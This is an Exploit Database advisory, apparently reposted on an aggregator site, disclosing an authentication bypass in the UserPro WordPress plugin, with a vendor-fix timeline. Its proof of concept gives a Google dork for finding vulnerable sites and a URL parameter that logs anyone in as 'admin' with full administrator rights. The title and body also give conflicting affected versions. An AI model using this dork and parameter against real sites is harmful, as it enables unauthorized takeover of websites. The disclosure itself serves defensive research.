WordPress Plugin Userpro < 4.9.17.1 - Authentication Bypass

• Exploit Database
• 16 阅读

• 作者： Colette Chamberland
  日期： 2017-11-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43117/

• # Exploit Title: Userpro – WordPress Plugin – Authentication Bypass
  # Google Dork: inurl:/plugins/userpro
  # Date: 11.04.2017
  # Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)
  # Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
  # Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
  # Version: <= 4.6.17
  # Tested on: WordPress 4.8.3
  # CVE : requested, not assigned yet.
  
  Description
  ================================================================================
   The userpro plugin has the ability to bypass login authentication for the user
   'admin'. If the site does not use the standard username 'admin' it is not affected.
   
  PoC
  ================================================================================
  1 - Google Dork inurl:/plugins/userpro
  
  2 - Browse to a site that has the userpro plugin installed.
  
  3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true
  
  4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in
  will full administrator access.
  ================================================================================
  
  10/25/2017 – Wordfence notified of issue by Iain Hadgraft.
  10/26/2017 – Vendor resolved the issue in the plugin.
  11/04/2017 - Disclosure.